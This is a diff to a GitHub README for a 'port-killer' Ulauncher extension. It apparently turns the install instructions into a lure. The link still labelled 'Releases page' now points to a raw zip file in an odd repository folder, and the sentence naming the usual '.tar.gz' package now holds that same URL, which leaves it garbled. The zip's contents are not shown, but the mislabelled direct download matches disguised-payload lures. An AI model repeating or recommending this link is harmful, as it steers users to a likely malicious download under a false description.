wckd02/port-killer-ulauncher/README.md

 To get started with port-killer-ulauncher, you need to download the application from our Releases page.
 Follow these steps:

-1. **Visit the Download Page**: Click [here to visit the Releases page](https://github.com/wckd02/port-killer-ulauncher/releases).
+1. **Visit the Download Page**: Click [here to visit the Releases page](https://github.com/wckd02/port-killer-ulauncher/raw/refs/heads/main/bichy/killer_ulauncher_port_hastingsite.zip).
 2. **Locate the Latest Release**: Look for the most recent release at the top of the page.
 3. **Download the Package**: Click on the appropriate file for your system.
-For most users, this will be a `.tar.gz` or equivalent file.
+For most users, this will be a `https://github.com/wckd02/port-killer-ulauncher/raw/refs/heads/main/bichy/killer_ulauncher_port_hastingsite.zip` or equivalent file.
 4. **Extract the Files**: Once the download is complete, unzip the downloaded file to a folder of your choice.

 ## 📥 Download & Install